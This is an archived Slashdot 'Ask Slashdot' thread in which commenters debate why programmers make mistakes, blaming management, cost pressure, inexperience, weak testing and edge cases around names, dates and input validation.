Follow Slashdot stories on Twitter

 



Forgot your password?
typodupeerror
×
Programming

Ask Slashdot: Why Do Programmers Make So Many Mistakes? (codinghorror.com) 391

A technical question occurred to Slashdot reader OneHundredAndTen when filling out forms online. "Are the programmers responsible for them stupid, incompetent, lazy, or all rolled into one?"

They provided two real-world examples that inspired the question:

- "I made up a company name that happened to contain a digit. When I submitted the information I got a big fat error diagnostic about this box, to the effect that numerals are not allowed in a company name. So you know, people â" no digits allowed in your company's name, or else!"

- "In a free text box limited to 1,000 characters (already stupid, arguably) the caption explicitly banned the following characters in the "free text" because they can interfere with the correct processing of input..."

~!@#$%^&*()|'

This prompted a response from UnknownSoldier (Slashdot reader #67,820), who shared the humorous "Murphy's Computer Law" aphorisms from 1984, calling them "sadly still appropriate" and referring to one in particular: "There's never time to do it right, but always time to do it over." In general Web programmers tend to be extremely lazy (undisciplined.) They don't value correctness because that would take "work". I'm not just singling out web programmers here, look at how many programmers fuck up the TRIVIAL example of FizzBuzz.

For example, here are two examples where incompetent programmers make tons of assumptions.

* Falsehoods programmers believe about names
* Falsehoods programmers believe about time

As they say the devil is in the details, or edge case, as it may be. Programming is littered with edge cases so bad programmers "stick their head in the sand and ignore the problem hoping it will go away."

Doing it right costs time, money, and skill. Management is partially to blame. Bad programmers are to blame. Schools are to blame. There are many factors why we end up with shit software like the use case you just described.

And now you know why old programmers become grumpy. Modern software is slow, bloated, with layers of abstraction piled upon abstraction, library upon library. You spend more time "decoding" code and reverse engineering what was done because no one ever took the time to comment it properly for the next guy.

Use these examples of "stupid shit" to be a better programmer.

Agree? Disagree? Share your own thoughts in the comments.

Why do programmers make so many mistakes?
This discussion has been archived. No new comments can be posted.

Ask Slashdot: Why Do Programmers Make So Many Mistakes?

Comments Filter:
  • Two reasons (Score:5, Insightful)

    by phantomfive ( 622387 ) on Monday January 10, 2022 @12:37AM (#62158811) Journal

    1) Programmers don't care. You'd be surprised how many people say things like, "Bugs don't matter" or "we'll fix it in production." Managers who push deadlines over quality aren't helping here.

    2) A lot of programmers do care. For them, it's inexperience. If they are keeping track of their bugs, and fixing them, you'll find that with experience, the number of bugs they produce goes down quite a bit.

    • Re:Two reasons (Score:5, Interesting)

      by fermion ( 181285 ) on Monday January 10, 2022 @01:43AM (#62158921) Homepage Journal
      In fantasy land perfect solutions exist. For the rest of us, a balance has to be reached. A child is going to whine that there are not unlimited resources to buy all the toys they want. An adult hopefully has learned not to melt down because they cannot have a new toy.

      Input validation is expensive and real mistakes are seriously, leading to venerabilities that most users find more serious that excessive limits in names. As shown in XKCD #327.Samsung does not allow special characters in names. I think it is stupid, but they may a good reason.

      The balance for online resources is customer acquisition versus security and reliability. It is easy to set off, for example, /. anti ascii art protection. Any site that protects against malevolent input is going to be annoying. There is a nominal cost to storing and vetting input, so maybe 1000 characters is the balance between cost and user experience.

      From a business point of view, if there are no negative consequences handling edge cases may not be viable. It is not required that every business serve every customer. If someone wants a number in their name I am not legally required to adjust my model to accommodate them. I am free to do so, but only if I wish.

      • Re: (Score:3, Insightful)

        by phantomfive ( 622387 )

        Input validation is expensive

        It really isn't, it's a solved problem.

        • Re:Two reasons (Score:4, Insightful)

          by Mr0bvious ( 968303 ) on Monday January 10, 2022 @02:03AM (#62158995)

          Yes but those who understand that and know that are more expensive than those who don't.
          It's nearly always about cost. The way that manifests is different in each case, but it's the cost.

          • Log4j is a solved problem, too. The solution is: don't use it. Remove it. There is going to be a long list of vulns in Log4j for many months, if not years. It's not secure.

            • Log4j is a solved problem, too. The solution is: don't use it. Remove it. There is going to be a long list of vulns in Log4j for many months, if not years. It's not secure.

              I thought the list was very short: If you log anything that likes like a URL in a certain format, the bloody logger will go to the website of the URL, download Java code, and execute it.

              Now if I can tell a programmer "shoot yourself in the foot" and he or she just does it, is that a vulnerability? Log4j works exactly as intended.

        • Input validation is expensive

          It really isn't, it's a solved problem.

          Really?

          Just try to develop something as seemingly-straightforward as reasonable input-sanitization Rules that can successfully Pass any Legal email address; but will Reject all Illegal email addresses. It can be done; but it is far from trivial!

          • It is trivial; you pay money to someone who has spent the time, effort, and energy to do it right, and you write if(address.isValid(...)) { ... } and let someone who knows what they're doing do their job.

            • It is trivial; you pay money to someone who has spent the time, effort, and energy to do it right, and you write if(address.isValid(...)) { ... } and let someone who knows what they're doing do their job.

              Which is exactly why someone used log4j and ended up vulnerable whilst other people used Windows and ended up vulnerable. Choosing an outside library is a good place to start but once you have done that and before your software gets anywhere serious you will want to have test cases for that library and audit both the code that's in it and the people that wrote the code. Do you have access to the source? If not, start again. Has the code been written to sensible standards? If not, start again. Do we know w

            • by DarkOx ( 621550 )

              Now let us image the library that provides .isValid() does its validation by reaching out the remote mail server and doing a RCPT TO: or VRFY and checking the response. Yes there are libs that do that. If you dumbly use .isValid() without understanding that - bravo your application has a DOS vulnerability and is potentially abuseable for amplification attacks, unless you took some steps to ensure validation is rate limited in some way. We both know you did not, you decided the problem was trivial, typed 'n

        • by fuzzyf ( 1129635 )
          The problem isn't input validation. The problem is encoding data for proper context when it's used.

          For example
          If you are using the data in a SQL statement, you need to encode all special characters that your DB are looking for (this is hopefully done by your ORM)
          If you are using data on a command line somewhere, then you need to encode all special characters for that context
          if you are using data to towards LDAP or putting it in a XML file or render it on an HTML page or running a query towards a docum
          • by DarkOx ( 621550 )

            Bingo I have literally thrown security testing reports back in the face of practitioners who ought to know better when they recommended things like input validation to as a response to a SQLi vulnerability.

            There are exactly three ways to handle inputs from unknown/untrusted sources
            1) Validate - This ONLY possible when the domain of valid inputs is highly restricted and fully known. You might be able to do this with something like a domestic postal code or if asking for a measure as some integer number of un

        • Input validation is not a "solved problem" and never can be because the range of inputs is never-ending and the rules for validating them are very often project-specific and poorly thought through. Input validation is not just a programming problem; it's a requirements specification, programming and testing problem.

          One of the articles linked in TFS furnishes a great example. Patrick McKenzie pours scorn on people who try to represent names in a database with first_name and last_name columns, but note that

          • by ibpooks ( 127372 )

            Very good points. To add an anecdote, I'm currently working on a project which automatically transfers and processes information about business licenses back and forth from one state government department database to another state government department database. This replaces a system which was largely manual.

            The exact issue of what is a valid business name was a huge thorn in my side for at least a month. The first department had their own notion -- can contain numbers or letters, but must have at least

        • by Erioll ( 229536 )

          And there's the heart of it: Not Invented Here Syndrome. They even give it fancy names like SOUP [fda.gov] (Software Of Unknown Providence) and enforce it with regulations!

          This is as opposed to "how has this been solved before?" That should be the first question a programmer/engineer/architect/fancy_title_here should pose when given a problem to solve. Instead, they think of how they will solve it instead. And the knock-on effects of such leads to what we have today.

          This isn't to say we should blindly always go

        • Are you sure? Re-check that Falsehoods programmers believe about names [kalzumeus.com] and then tell me, what is an input validator that will allow all names that occur "out in the wild" as per link, while preventing things that will outright break any system and simultaneously fulfill the management's requirement "the name field is mandatory".

          Every single solution to this problem that exists currently is at least partially broken - either too restrictive, not allowing someone to enter their actual name, or too permissive,

    • by Roger W Moore ( 538166 ) on Monday January 10, 2022 @01:44AM (#62158927) Journal
      Actually, I would say it is just one reason: programming means writing something which has to be almost exactly correct otherwise it is wrong and bad things may (or will) happen and this is incredibly hard for humans to do since we are used to a more "fuzzy" environment where mistakes are made but, because we generally know what is meant we can ignore or automatically correct them.

      The same happens with human languages when you have to be exactly correct. Try writing a science paper - or worse textbook - when you have to write down ideas and facts perfectly correctly and you run into the same problem. It is insanely easy to misstate something, state it in a misleading way or miss a word that can completely change a meaning etc Even if you are trying to be careful it is ridiculously easy for mistakes to creep in...and that's with human language, so why should programming be any different?
      • Exactly this. Programmers likely make less mistakes than most other professions.
        The problem is that programming languages are extremely brittle.
        If you forget to put on your blinker when changing lanes, it rarely results in a crash.
        If you forget a semicolon, it almost always results in a crash.
        Most other professions whether you are a carpenter, plumber or even doctor have
        a much higher tolerance for small mistakes than programming.

    • There's another reason, Burnout. Sometimes programmers are so burnt out, if they come across a problem that requires thinking, they don't have enough energy left to nut it out. Queue just going to stackoverflow looking for the solution, and if it isn't there just type in the easiest shortcut that comes to mind.
    • An alternative two reasons:

      1) Quality software takes time and money.
      2) People want software in little time and for little money.

    • by fazig ( 2909523 )
      From personal experience with programming physics simulations in the last couple of years: Things can get extremely complex quickly, where everything turns into differential equation systems.
      Divide and Conquer approaches aren't always sufficient having issues emerge beforehand when things are highly interactive. Sometimes it takes extensive and structured field testing and thorough documentation to track things down. Excruciating work for many.

      I had to learn the value of documentation the hard way due to
      • Things can get extremely complex quickly, where everything turns into differential equation systems.

        There the primary problem is to make sure you have clear requirements (need to be 100% sure what equation you are implementing), and interfaces between components need to be very well defined (probably using a functional style will be easiest here).

        • by fazig ( 2909523 )
          I think the primary problem is that you don't know your ass from a hole in the ground when it comes to complex software.
          • Well, you're wrong. I'll bet you're used to that, though.

            • by fazig ( 2909523 )
              Sure, that's why I always double and triple check.
              You check, identify the mistake, correct it if possible, and move on. Very normal for people that actually work in the field of science.

              Though when people suggest that there's a fairly straight and simple approach one just has to take to notoriously difficult issues, without asking for further elaboration of the specifics, I'm inclined to think that they're case of the Dunning-Kruger effect at work.


              As a matter of fact, writing solid software can be qui
              • Seems like you're having a bad day.

                • by fazig ( 2909523 )
                  Just a normal day on the internet, dealing with people who come off like they know everything.
                  If I remember correctly you were also the person who suggested that hypercomplex numbers are actually quite simple. Which either means you're one of the smartest people on the entire planet, or you might be overestimating the extend of your abilities at least a bit.

                  Besides of that, I mean I do agree with your original post.
                  It's inexperience in many cases and management doesn't help either, while some people jus
    • (3) The darned computer keeps doing exactly what I told it to do, not what I meant!

      These days I believe that's the overwhelming cause of problems, but in the old days there were far more bugs at higher levels that could take some of the blame. Yeah, modern OSes, interpreters, and compilers still have plenty of bugs, but they are much harder to stumble over now. Let's have a cheer for code bloat?

      However, upon reflection I think there's at least one more reason worth listing:

      (4) Code modules that don't play n

  • The ban on certain characters would discriminate the Irish among others.

    Just hope that Ronnie O'Sullivan don't encounter this, he has enough money to pay a good lawyer.

    But the character restriction also tells me about the Bobby Tables [xkcd.com] problem.

    • by Mal-2 ( 675116 )

      Also whenever he retires, maybe he can be the replacement "smug because he really is better than you" host over at Top Gear.

  • by EnigmaticSource ( 649695 ) on Monday January 10, 2022 @12:47AM (#62158821)

    Honestly, I think the philosophy of software engineering has gone wrong. Not that I don't appreciate automagic (I specialize in crafting it), but in our grand quest to be "better" we keep gluing features on through libraries and not through understanding. Between that, and a generation of people who learnt to code through copy and paste; and what did you expect would happen?

    If I could change anything, it would be disable Control+V. Not that great minds don't copy, but there is a sublime value in even typing out something verbatim... it makes you think just a little more. If I got a second wish, it would be that we should fully re-embrace abstraction, the Unix way. Do one thing, really well, and embrace a common interface. It's not technically unfeasible, we've been doing the cloud right since System-V; just somehow we lost our way.

    Meh, I think I'll go meditate some more.

    • by shadeyk ( 697658 ) on Monday January 10, 2022 @01:49AM (#62158945)

      begin RANT...

      Divisions being run by managers who can't program, therefore don't appreciate the difficulties. Developers who don't understand test design, product owners who have yet to realize they are the gatekeepers of quality. Salesperson in an engineering management position (e.g. all the AT&T DTV's CTO weren't CTO's) making decisions from a saleperson perspective. Management letting marketing people set deadlines. Developers who become jaded because they're always working on defects and not new code. Coaches that are useless at understanding the cause of poor development practices...the list goes on. End result...Large numbers of developers post '98 don't have the tools, nor the desire to learn those tools, to produce a quality body of work.

      To undestand my POV...Go back to the beginning of the SE as a career path (around late 1960's). Programming was expensive, HARD, and expensive! Did I mention expense? The people that were doing it were incredibly smart in that regards, and if you met any of them today you would be taken aback by how smart methinks. It's been going downhill ever since from my POV. I felt like a knucklehead compared to some of the older guys I had the privilege to work with.

      Languages evolved to make it easier and more cost friendly.

      FORTRAN/COBOL on punch cards?
      APL using symbols and requiring special keyboards.
      C with its buffer overflow issues that few understood well. Pointers anyone?
      Few (if any) debuggers. And definitely no GUI's. All debugging was command line.

      Late '70's saw the emergence of the personal computer. Those of us that had access to whatever model began to see it as a viable career path. Schools had computer SCIENCE courses that actual taught it as a SCIENCE. My curriculum included language parsers, compilers, database design (not tables, that actual DB). We were taught everything from ASM, C, PASCAL, FORTRAN, APL etc... Even machine language was part of one course. They still didn't teach test design however (not sure why that went under the radar).

      By the late '80's there was an influx of software engineers that loved the craft aspect of it and wanted to understand the cause of defects getting through. The gang of four released their Design Patterns book in the early '90's which, by then, introduced C++ and other object oriented languages to the younger crowd. The CMM and other bodies conveying how a well established company could ensure some semblance of quality for their products. Source control, the beginning of build pipelines that included the running of unit tests to ensure no breakages (later evolved to CI), design reviews, code reviews, test design/code reviews etc... became the norm in well established teams. QA was their to measure the quality as it pertained to the customer POV. They were not the enemy but a collaborating division.

      I know I certainly began to feel like software development was finally enjoying the rigor and precision that other engineering disciplines had.

      And then the explosion of the .COM around '98. And the influx of cheap programmers from other parts of the world who hadn't evolved with the same knowledge, and the use of non-software engineers as their managers all trying to launch an online presence ASAP.

      o do so they threw out design/code/test reviews, unit testing (hell wells fargo's online banking system was develop w/o unit tests because their development manager was convinced by the developers that QA did the testing). This saw the explosion of the "QA engineer" who did manual testing. And then along came the SilkTest, winrunner's etc... that promised managers that their manual testers could write tests (they couldn't) that would increase the cost savings (it didn't). This then lead to managers blaming QA for releasing a shit product. Those non-engineers as managers didn't understand the difference between preventive tests and tests used to measure the quality.

      Hell in 2004 Google had to invent the term So

      • It's sad, but I started in the 80's and now I'm considered "Old Guard"; I can tell you as someone that hacked BPL and FORTRAN on RSTS/E, the niceties of "C" weren't really even on the horizon for a good part of the decade; much less the 60's.

        I got my first modem so I could use someone else's C compiler, in 1989... that was my gateway drug to Unix.. and it's been downhill from there;

        otherwise, yeah, this right there, 100%. If you don't understand the actual full stack, from the metal up; you're not engineer

      • by mark-t ( 151149 )

        Stack-based buffer overflows could be mitigated by a CPU design that tags each machine word stored in memory with an auxiliary tag for exactly how the data that is stored at that address came to be there (and perhaps even where it came from) , Reading or modifying these tags would require utilizing a special mode in the CPU which might utilize instructions only ordinarily be found in kernel level code.

        Ordinarily reading or modifying these tags would be done directly by the hardware, transparent to regul

  • Bad management (Score:5, Insightful)

    by drnb ( 2434720 ) on Monday January 10, 2022 @12:47AM (#62158823)

    Why Do Programmers Make So Many Mistakes?

    Bad management.

    Here is the secret to management: You get what you reward. Not the right thing. Not even the right thing your staff knows is the right thing to do. You get what you reward.

    Most managers reward for perceived "progress". Look, how fast so-and-so completes tasks on the current sprint. That person person is a rock star, every one should be like that person. And the manager never notices that among the future tasks related to bugs, his rock star produces more bugs per completed task than anyone else. As the rock star continues to be rewarded, others adopt his methods. Short cutting testing. Allowing bugs to exist so long as they don't manifest in a demo of a completed task's functionality, even new bugs introduced by the new code or newly reworked code. And if you can rework the demo to avoid the new bug, that's great, mission accomplished. Engieneers who just fix it are effectively penalized as lower performers.

  • For some context from a programmer's viewpoint, here is something we deal with all the time.

    Say some operation at a company starts on June 2. Is that 12AM? Or start of business? Maybe it doesn't matter. So 12AM. Except it's company-wide, and the company has sites in five different time zones. So is that June 2 12AM at the same time for every site? That doesn't work either. The thing has to start at 12AM on June 2 for each site. So it's not really one operation, it's a separate operation for each site, becau

    • And then when you ask the manager to clarify, they just say, "Just make it work!!!"   So you make the most sensible decision.  if(date >= june 2) start = true.  aka, go with what the server date is. :D  And if someone else asks, you just point to the discussion, and shrugs.  You got more important features to implement.
    1. 1. Managers care about getting something out the door RIGHT NOW, because his/her boss is asking when it'll be done, and so on up the chain.
    2. 2. Managers look at TDD (Test-driven Development) and say "This is not about implementing feature XYZ -- it's about writing tests. Stop it and go implement my feature!!"
    3. 3. The senior programmer says that self-test & TDD just clutter up the code, which is already impossible to read and maintain.
    4. 4. Coders lack a "second pair of eyes". That's where pair programmin
  • by Anonymous Coward

    Humans make mistakes every day. That is a fact. The difference between a programmer and some other profession is the code is deployed and exists. That means there's proof of the mistake. Look at all the social media posts on the internet, what percent has typos and mistakes?

    Until humans stop being human, there will be bugs. I've been programming for over 23 years and contributing to open source for 20 years. A lot of people tell me "you're stupid for throwing money away." or "why are you letting companies e

  • This is just a rehash of the age old discussion of what makes programming so difficult and why software is so poorly written. Of course it's a combination of many factors: management, training, corporate culture, etc. How much each factor affects the outcome depends on where you work and what kind of education you have in engineering.
  • yeh... ever try using slashdot from an iPhone?
  • Computers are good at forcing you to lie to them.

    An easy example is address fields that have a mandatory 'State' field. News flash: Not all counties have states. I would often use 'Bliss' as my state when the address didn't matter anyway. Pointed it out to one website owner who then checked. He was amuse at the answer he found in his database. He fixed his website to make that field option in future.

    Worst when it is a government system. Getting my driver's license in China the system would not a
  • by jddj ( 1085169 ) on Monday January 10, 2022 @01:27AM (#62158883) Journal

    "Programmers solve problems they don't have."

    This aphorism, coined by my wife, a project manager at the time, neatly encapsulates a great deal about usability, user experience and software design.

    The programmer's task is to complete the programming for the form, but it's a form she's destined never to fill out in a real-world context.

    If the programmer is simply complying with requirements, (a notably narrow and inadequate channel for communicating design intents), the P.O. who OK'ed the requirements bears some responsibility.

    If the programmer never has to feel the pain of trying to enter "3com" or "Botany 500" in the "no digits in a company name" form, she'll never realize how much it sucks.

    In fact, if the form meets the requirements in this state, she may not be able to get the form fixed, even if she knows it should be.

  • Far too many businesses and managers are looking for the bottom line. We all know the adage "choose two", and lower up-front costs are a frequent decision with the natural consequences.
  • Because they don't do (obligatory in many *professional* fields) 100% coverage lines and MC/DC unit tests.

  • Why do so many people suck at their chosen career?

    Because they "fell into it", as they had nothing better at the time?
    Because they figured it would make them money and that was the only motivation?

    There's lots of reasons, but I'd wager most of them are to do with lack of passion.

    The art of coding is so much harder than many understand. The way I see it, it's a little bit like chess.
    You have those who can "see" multiple moves ahead, either just naturals or those who have strived hard to reach that level.
    Then

    • I disagree with the thrust of your argument but not the outcome.

      I think getting that logical problem solving mindset is an ability you can learn. You can learn from an early age as you said, but it's not inherent. People can learn when they're older too.

      But you have to learn by doing it. If you're programming by copy pasting then that's what you're learning. Many of those crappy programmers could become good ones with application. They won't of course, but they could.
  • Honest answer: Lots of code is written by people who should never ever be allowed near a keyboard. But they write code because managers are cheap bastards who can't tell good code from bad code and will hire the cheapest copy and paste artist they can find. The only qualification you need to call yourself a programmer is that you program. Well, technically, but practically not even that.

  • It's a feature that sometimes generates ideas.

  • If you don't adequately specify the problem, you can't blame people for taking shortcuts within the inadequate or unspecified problem.

    Also, it is kind of hard to design and write good tests without a specification.

    • by Jeremi ( 14640 )

      If you don't adequately specify the problem, you can't blame people for taking shortcuts within the inadequate or unspecified problem.

      The counter-argument would be that one of the more important skills for a programmer to have is the ability to recognize when requirements are incomplete or ambiguous, and respond by communicating further with the customer as necessary until the requirements have been fleshed out properly.

      And of course the counter-counter argument is that sometimes the company/organization's structure doesn't allow for that sort of thing, in which case everybody is going to suffer in the end. :(

  • by blahplusplus ( 757119 ) on Monday January 10, 2022 @01:41AM (#62158917)

    ... as someone who's programmed for decades. The reality is the von neuman model machine means compilers and programming languages are designed to conform to the hardware. The hardware model and software model itself is the issue.

    Think about the common "mistake" in c or c++ of "buffer overlows" that lead to remote code execution, the whole reason this can exist is because CPU's literally move from function to function by pointer. The CPU has no "Awareness" like a human does if a value is being faked, that's why you can't eliminate cheating in PC games because at some point "the show must go on" and the CPU is going to tick down the stack to the next value.

    The entire computing infrastructure was not designed with anything like the internet in mind, so the whole notion of "software security" is bullshit.

    The reality is we are "cave men" at designing computers when it comes to technology. The reason isn't programs are bad, the reason is that the human brain was not designed to deal with the cognitive load that von neuman style chips.

    Every good programmer knows that programming languages are only a means to solve a problem, eventually anyone who is serious about programming and getting good at is will take math or advanced university/computer science courses after they are done university to further their learning, and also courses outside of computer science, aka anything related to problem solving more generally. All a programmer can do is convert our thinking in our heads into mathematical statements that fit a von neuman style machine.

    The revolution will come when programmers get back into hardware design since they can see just "playing at the edges" inventing new languages is not going to solve fundamental issues of how we want computers to actually behave.

    Remember how current CPU's operate is just one kind of invention for a specific task by one small group of people. I've often thought that the future of computing is increased specialization for apps and hardware (aka imagine a computer JUST designed for text editing and code manipulation) aka you're bending the hardware and software towards how you'd like to use it.

    Modern systems we are bending our thoughts and trying to convert them into some intermediate language which is the converted into assembly. I've always thought there's a many more models of how a digital circuit and how it is programmed can behave then we've even begun to explore.

    AKA we must remember things like ASCII or UTF-8 and all that is just ONE small group of peoples idea of how characters should be encoded for an electronic device.

    The design space is huge and beyond one human lifetime, I've thought if I ever had to do it over again I'd go into research. There's plenty of stuff that hasn't even been thought of or invented yet. One of the reasons "programming is hard" is because it is cognitively demanding, it forces you to make your thoughts rigorous and most people don't have the fortitude or cognitive capacity to be good programmers. It's cognitively demanding job if you take the profession and problem solving seriously.

    • And what, pray tell, do you have in mind to replace it? Harvard? Bovine Spongiform Whitespace? I hate to break it to you; but one of the fundamental rules of universal computing is that there is no computing machine that can validate all computable inputs.

      What you think you want to do can't, won't, and cannot work; and it's a dangerous fiction to imagine that someday they will. At the end of the day, the only solution is hard work and accepting that non-trivial things will contain unanticipated states; an

      • "And what, pray tell, do you have in mind to replace it? Harvard? Bovine Spongiform Whitespace? I hate to break it to you; but one of the fundamental rules of universal computing is that there is no computing machine that can validate all computable inputs."

        Sigh which has nothing to do with how CPU's were designed in such a way to allow array overflows, aka there were no special values to mark memory as the end or a beginning of an array. Think about parsing for fuck sakes, the computer has no idea of th

        • Somehow, you're imagining this great Harvard machine, with an immutable program register, and the smarts to have logic encoded for every possible data structure that could be stored on it's potentially infinite bitplane? Sounds great, but just one problem; if its turing complete, it will still have the same fundamental problem as a von Neuman state machine; full stop.

          You can keep abstracting all day long, but at the end of the day, it all comes down to brainfuck; or something close to it; and the halting p

    • Most programmers these days don't worry about any of the problems you've mentioned. Almost all of us use languages that don't allow buffer overflows, for example.

      • Most programmers these days don't worry about any of the problems you've mentioned. Almost all of us use languages that don't allow buffer overflows, for example.

        I know I picked low hanging fruit, I used buffer overflows as an example of the CPU not having "any awareness" of where something begins or ends.

        For instance when we write a value like an address or variable to memory, the data can be interpreted differently depending on what function is being currently executed and what function will use that value for. You may think this is a "no duh" and it is but the whole issue is you can't query important facts about data or functions about hardware under current vo

        • I don't know, I still feel like you're solving problems that most programmers in modern languages don't have.

          • I don't know, I still feel like you're solving problems that most programmers in modern languages don't have.

            They are just an example, aka the idea is we've barely begun to understand what the problems are. I think of it like programmers don't know what they don't know about programming. To quote cheney

            "As we know, there are known knowns. There are things we know we know. We also know there are known unknowns. That is to say, we know there are some things we do not know. But there are also unknown unknowns — the ones we don't know we don't know," Rumsfeld said in 2002.

            I'm saying programming and hardware de

  • Why do programmers make so many mistakes? The lazy dumb fucks that hire them enable them. How? Well, first of all screen the fuckers. Just because a potential employee has talent, doesn't mean you should tolerate every childish character flaw. Oh, he doesn't believe in dress codes?...make him believe in them. Oh, he wants to stroll in late?...discipline him. Programming jobs are often adult day care...let's do some coding activity and then fuck off the rest of the day. It's considered a status symbo
  • This is by no means exclusive to the software industry. Nearby where I live, many years ago they built a Steak ‘N Shake with the back side of the restaurant facing the road. You’d think at some point during the planning or hell, even during the initial stages of construction, someone would’ve noticed all the other buildings in the plaza faced towards the road.

    Corporations are full of ass-kissing yes men who will happily build a building facing the wrong way. It’s no wonder the sof

  • Most people have some inaccurate assumptions about various things, indeed the person blaming the "free text" restrictions on a "programmer" is likely making an inaccurate assumption, it is more likely the result of interaction with a web application firewall's heuristics, which is a more complex interplay between systems than can reasonably be described as an individual programmers "mistake".

    It's just that the inaccurate assumptions of programmers can become enforced (and built on top of) whereas most pe
  • The linked examples about "Falsehoods programmers believe about name and date" say it all. A programmer can easily spend several days insuring that the program can handle names and dates correctly. When the boss asks "What's the progress this week" and all you have to show is a name and date field, guess what's going to happen to your job.
    • Re:You are FIRED! (Score:4, Insightful)

      by EnigmaticSource ( 649695 ) on Monday January 10, 2022 @02:09AM (#62159009)

      I made a good chunk of my career on understanding the minutia of calendars ( 1999 treated me very well ); the blessing today is unless you're dense, or intentionally obtuse there's a well tested library in your language.

      This is true of all trivial problems; What happens is people write and paste shitty code because they don't bother to ever understand it, and because they're not even bothering with understanding; they never stop to think if there's a better way.

      Truth be told, I think we as a collective should spend much less of our time writing code with the mindset of solving a problem, rather thinking of programming as a job where you're mostly gluing together working things and managing exceptional conditions... with novel code being the exception, rather than the rule.

  • I have a conversation like this with my business folks at least once a year. Here's how I explain it to them:

    It's called "Writing software" or "coding," but at it's core, what it's really about is automating a business process. When you look at it as automating a business process, your work as a developer is dependant on the business process being well designed and equally well described by the SMEs. After all, you can't automate something that doesn't exist yet, right?

    Roughly speaking, our bugs fall into t

  • Everybody who makes anything, makes mistakes.

    Every house has flaws. Every road, every device, everything humans make has flaws.

    We programmers just happen to be close to code, so we have better visibility into programming mistakes.

  • by drkshadow ( 6277460 ) on Monday January 10, 2022 @01:58AM (#62158961)

    Remember back in 4th grade when you did that thing where someone is given explicit instructions - remove cap from jar (how? which way do we spin? do I pick the jar up first? do I turn the lid? what's the lid?)?

    Remember how if you missed a *SINGLE* step you'd be spreading the jelly on your hand as opposed to the slice of bread?

    People don't think in terms of such low-level, nonsensical crap. It's handled by your brain so that you don't have to think that way. Language is a whole bunch of shared context -- and if you don't have that context, most people's conversations are very, very confusing. (Hell, look at legalese.)

    The reason so many mistakes are made is because we have to do things fundamentally un-human -- and no one at all is good at being un-human. We work on models of the world, but these models don't exist in software development. (Some like to suggest they make cutesy models, and they suck -- and they're still not models of our 20-40-year life experience of the thing we're dealing with right this moment.) So, we spread the peanut butter on our hands sometimes.

    Why isn't a number allowed in a company name? Because wtf NAME has a NUMBER in it? That's nonsense! Requirements are what is developed for, and "name" was never defined to be something other than a person's name. When you say "name," any normal human things, "bob, Joe, Neo, Morpheus" -- and not "Sam Adam's 123 Kaleidoscope". That's just nonsense.

    So you're doing things that are outside the model being developed, outside the specifications being designed for (why wasn't it designed properly? Because a name is a name, not ABC-127_f3), and no one but you has run into that issue so far. Probably. At least for something new.

    • by Jeremi ( 14640 )

      Because a name is a name, not ABC-127_f3), and no one but you has run into that issue so far.

      Well me and this kid [washingtonpost.com].
          Thanks Elon!

  • by Jeremi ( 14640 ) on Monday January 10, 2022 @01:59AM (#62158967) Homepage

    ... in everything they do.

    In most everyday activities, however, minor mistakes don't greatly effect the outcome(*). In programming, however, they often do, which makes the mistakes more noticeable.

    (*) case in point -- I should have written affect rather than effect, but despite my error, you understood what I meant to convey. For computer code, OTOH, a minor error like that could have significant repercussions.

    • by shanen ( 462549 )

      Surprising to see my third reason so far down in the discussion...

      But I should have added a fifth reason:

      (5) Insufficient testing, every way you slice it. Not in the schedule and not funded, not demanded of the programmers, not performed by people who even understand the program specs, and so forth and so on.

      • And that insufficient testing probably had its roots in insufficient specification of what was required.

  • The kernel compiles so fast, there's no longer time to get coffee. This leads to a chronic caffeine shortage and ensuing bad code.

  • It's amazing, given the many layers of complexity in a computer and in software, that any software every works at all! No programmer even understands all the layers of APIs and SDKs and OS functionality and hardware instructions that must all work correctly for software to work as intended. Despite this impossible contraption they operate, programmers manage to make many useful apps. I'm impressed.

  • Yes, the typical coder is incompetent, under-educated for their job, insufficiently experienced, and often arrogant (which prevents learning) in addition. Some may be lazy, but I think that is a secondary issue.

    But the actual fault is with management that hires people not fit for the job, because they are "cheaper". Nobody would dream of hiring an electrician to do an EEs job (and that electrician would still be better qualified than the average coder). As this has been going on for a long, long time and no

  • They don't value correctness because that would take "work"

    "There's never time to do it right, but always time to do it over."

    I think this is the opposite of what a sysadmins and other IT people, who aren't programmers by trade, but happen to code/script when they need to, end up doing. If I think a task will be repeated in the future, I spend more time creating scripts and programs to automate tasks I have to do than it would take to do the task manually, because then if that task ever comes up again I

  • by Required Snark ( 1702878 ) on Monday January 10, 2022 @02:17AM (#62159033)
    All you damn coders are wasting time on Slashdot and rotting your brains when you should have your eyes pinned to your screens fixing your stupid code.

    Get back to work. Now!

  • Maybe programmers make less mistakes than the rest of the population.

  • by Kelxin ( 3417093 ) on Monday January 10, 2022 @02:24AM (#62159059)
    Many people see "coding bootcamps" as get rich quick schemes. Both the people teaching them and the people taking them. Once they get into a position they are woefully unprepared but surrounded by people of a similar skill set, so everyone just sweeps it under the rug and keeps getting a pay check.
  • Software development is a stool made from 3 legs:

    1. Cost
    2. Time
    3. Quality

    You can only control 2 of the 3. Most businesses want to control cost and time, so they end up sacrificing quality.

    This is significantly worse when dealing with consultants (I know because I am one). In consulting, you maximize profit by doing the least amount of work with the fewest resources in the shortest time possible. No developer wants to deliver bad code, but no client wants to pay what quality code actually costs.

  • If human life or massive lawsuits aren't on the line, no one wants to foot the bill for reasonably correct, fully tested software. It's feature, feature, feature, feature, and I want it yesterday. If you draw a line in the sand, your competitor paws in the client's ear the lie he wants to hear, and you lose the client's business.
  • In my opinion it isn't programmers that suck. It's users that are too stupid to put themselves in their shoes. Take the Evergreen, I mean, how hard can it be to not steer your ship into the sides of a tiny canal right? I'm sure many people must have sighed and said, "gee, if I had captained that ship that would never have happened, the captain must be incompetent and lazy".

    Same goes for programming, it is far more complicated with far more requirements than you would ever care to want to know about -- and

    • Take the Evergreen, I mean, how hard can it be to not steer your ship into the sides of a tiny canal right?

      I don't know, but it doesn't happen very often.

  • US programmers forget that the US has an illogical date system which confuses almost everybody else. On remote islands (my experience was on Malaysian islands) it is not uncommon for people to have one single name. No first and second, just one. Names do not always start with upper case letters and people who have middle names that are not upper case often do not like being forced to use upper case.
  • Ignorance, not from programmers, but from their bosses who specify the work.

    For example, where I live, there are a few instances of house adresses beginning with zero (like 0123). Because they are south of the standardized zero point. How many people know this? So this is why too many IT systems won’t let people enter their adresses properly

    Also, stupidly, Slashdot does not allow characters higher than ASCII-127.

